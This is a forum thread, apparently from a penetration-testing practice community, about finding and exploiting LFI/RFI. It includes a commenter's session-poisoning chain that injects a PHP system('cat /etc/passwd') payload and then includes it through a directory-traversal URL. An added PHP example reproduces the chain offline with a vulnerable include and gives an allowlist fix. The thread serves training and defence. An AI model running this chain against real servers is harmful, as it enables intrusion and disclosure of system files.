LFI / RFI boxes

Hey there,

Can anyone list some boxes that are good for finding / exploiting LFI and RFI?

Being able to recognize these in web apps is my weak point.

Also, any pointers on how to notice when an LFI vulnerability could be present?

Cheers

Comments

  • I am currently writing a program that can do that, and I would have no problem explaining a little bit of what I have learned about what to look for, how to detect it, and what basic tests my code will do. I am also putting a short timeline on this code; I should have it ready in a week or so for people to try out, so if you want to chat just hit me up. I am up late working on these and all my friends are sleeping ;)

  • When you have ?page= or ?language=.
    You could also use Kadimus:
    https://github.com/P0cL4bs/Kadimus
    but don't trust Kadimus too much.

    peek

  • Thanks wabafet - can't wait to try it out.
    peek - thanks for the two points. Also, trying Kadimus now. After playing more with the PWK coursework example I have a better grasp.

    Thanks again

  • Just saw this thread, and in case anyone finds it useful: a few months ago I created a small tool to make the process of finding and exploiting file inclusion and directory traversal vulnerabilities a bit easier. It's still under development and you can find it here:
    https://github.com/chrispetrou/FDsploit

    game0ver

  • thanks, I will test it

    peek

  • Thanks game0ver, I will give this a spin!
    On a side note, I just received the email: I passed my OSCP exam today!

    Cheers and thanks to everyone on HTB!

  • Congrats @mxz3n !
    Thanks guys for trying out my tool. It's still under development so feedback is much appreciated!

    game0ver

  • LFI: Lacasadepapel
    RFI: Help

    death

  • I will admit that is pretty cool game0ver

  • edited April 18

    OK, I have a question here.
    Say we know that from some method we can inject code into the session variable, which I have learned PHP 5 does by default:

    var/lib/php5/sess_infoforsession -> the actual session file that is stored server side

    My question here is, say I do this:

    <?php system("cat /etc/passwd");?>

    http://url.com/index.php?id=5&tool=bag&lang=en_us.php

    That ends up in the session file. Then, once I verify the LFI, I want to do this:

    http://url.com/index.php?id=5&tool=bag&lang=/../../../../../../../../../var/lib/php5/sess_sessioninfo

    I will include the session file that is stored on the server, and because it is valid PHP it will execute and give me back the info I need from the /etc/passwd file.

    But what I want to know is how this happens. Is it because the lang parameter is doing an include, and when it finds the PHP we included, only the actual PHP code in the file will execute, allowing us to get RCE?

    Otherwise, how does all the other stuff in the session file not break it?

    From my limited knowledge it seems to me that if we have a valid include and the programmer leaves an LFI up for grabs, but we can't seem to get RCE, we can resort, if it is PHP 5, to seeing if we can store the info inside the session file server side, like with Apache log injection?
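The comment above asks why the serialized noise around an injected payload in a session file does not break the include. An added example (written for this page, not code from the thread or from any of the tools linked above) that models the chain offline: a `lang=` parameter fed straight into `include`, a session file built the way the default `php` serialize handler writes it (`key|<serialized value>` per key), and the allowlist fix. Everything here is constructed: the session file is written under the system temp directory instead of the real session.save_path (which is `/var/lib/php5` on Debian-derived PHP 5 installs and varies elsewhere), the file name is not a real PHPSESSID, and the payload prints a harmless string instead of calling `system()`.

```php
<?php
// Added example: LFI -> session poisoning -> code execution, plus the fix.
// Assumptions (not from the page): a lang= value reaches include() unchecked,
// session.serialize_handler=php, and a constructed session file in /tmp.

// Vulnerable pattern: attacker-controlled path reaches include() untouched.
function vulnerable_include(string $lang): void
{
    // Nothing stops "../../var/lib/php5/sess_<id>" or a php:// wrapper here.
    include $lang;
}

// Hardened pattern: allowlist of known names; directory and extension are
// fixed by the code, so the request can never pick an arbitrary file.
function safe_include(string $lang, string $dir): bool
{
    $allowed = ['en_us', 'de_de'];                 // hypothetical language files
    if (!in_array($lang, $allowed, true)) {
        return false;                               // traversal, wrappers, .php: rejected
    }
    include $dir . '/' . $lang . '.php';
    return true;
}

// Build a session file the way the default handler would store it after a
// request like ?id=5&tool=bag&lang=<payload> has been saved into $_SESSION.
function build_session_file(string $payload): string
{
    $data = 'id|' . serialize(5)
          . 'tool|' . serialize('bag')
          . 'lang|' . serialize($payload);         // s:<len>:"<payload>";
    $file = sys_get_temp_dir() . '/sess_example';  // constructed, not a real session id
    file_put_contents($file, $data);
    return $file;
}

// Benign stand-in for <?php system("cat /etc/passwd"); ?>
$payload  = '<?php echo "[code ran inside the session file]\n"; ?>';
$sessFile = build_session_file($payload);

echo "Session file as stored on disk:\n", file_get_contents($sessFile), "\n\n";

// Why the surrounding bytes do not break anything: include() emits every byte
// outside <?php ... ?> as literal output and executes only what is inside the
// tags, exactly as it would for a template file with mixed HTML and PHP.
echo "Vulnerable include of the poisoned session file:\n";
vulnerable_include($sessFile);
echo "\n\n";

echo "Same path against the hardened version: ";
var_dump(safe_include($sessFile, __DIR__));        // bool(false): never reaches include()

unlink($sessFile);
```

Run it with `php` on the command line: the first block of output is the raw `id|i:5;tool|s:3:"bag";lang|s:55:"<?php ... ?>";` record, the second shows that record echoed back with the payload executed in the middle of it, and the hardened version returns `false` without touching the file. Two practical caveats when trying this on a target: the traversal must land on the exact file name `sess_` followed by the PHPSESSID cookie value, so you need to know the session id and the configured session.save_path, and the payload has to reach the session file unmodified (a parameter that is validated or mangled before being stored in `$_SESSION` gives you nothing to include).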
